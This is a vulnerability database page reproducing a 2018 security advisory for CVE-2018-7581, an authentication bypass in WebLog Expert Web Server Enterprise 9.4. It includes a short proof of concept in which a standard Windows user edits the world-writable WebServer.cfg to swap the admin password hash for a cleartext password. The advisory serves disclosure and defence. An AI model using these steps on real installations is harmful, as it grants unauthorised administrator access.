Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebLog Expert Web Server Enterprise 9.4 Weak Permissions Vulnerability

🗓️ 08 Mar 2018 00:00:00Reported by hyp3rlinxType 
zdt
 zdt🔗 0day.today👁 35 Views

Weak Permissions in WebLog Expert Web Serve

Related
Code
ReporterTitlePublishedViews
Family
CNVD		WebLog Expert Web Server Authentication Bypass Vulnerability
9 Mar 201800:00
cnvd
CVE		CVE-2018-7581
9 Mar 201820:00
cve
Cvelist		CVE-2018-7581
9 Mar 201820:00
cvelist
Exploit DB		WebLog Expert Enterprise 9.4 - Authentication Bypass
9 Mar 201800:00
exploitdb
EUVD		EUVD-2018-19302
7 Oct 202500:30
euvd
exploitpack		WebLog Expert Enterprise 9.4 - Authentication Bypass
9 Mar 201800:00
exploitpack
NVD		CVE-2018-7581
9 Mar 201820:29
nvd
OSV		CVE-2018-7581
9 Mar 201820:29
osv
Packet Storm		WebLog Expert Web Server Enterprise 9.4 Weak Permissions
7 Mar 201800:00
packetstorm
Prion		Default credentials
9 Mar 201820:29
prion
Rows per page
[+] Credits: John Page (aka hyp3rlinx)    

Vendor:
========
www.weblogexpert.com


Product:
========
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.



Vulnerability Type:
===================
Authentication Bypass



CVE Reference:
==============
CVE-2018-7581



Security Issue:
================
The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4
has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.

A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer"
set to a cleartext password and login as admin.

e.g.

C:\ProgramData\WebLog Expert\WebServer>cacls * | more
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C         
                                                      BUILTIN\Administrators:(ID)C
                                                      NT AUTHORITY\SYSTEM:(ID)F
                                                      BUILTIN\Administrators:(ID)F


Exploit/POC:
=============
Login as a 'Standard' Windows user
Comment out the Admin hashed password using ';' then add any cleartext password as follows.

[User:admin]
Password=1234
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
bAllProfiles=1

Now login in as Admin! :)

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Mar 2018 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.0009
weblog expert web serverweak permissionsauthentication bypasscve-2018-7581cleartext passwordadmin loginwindows user
35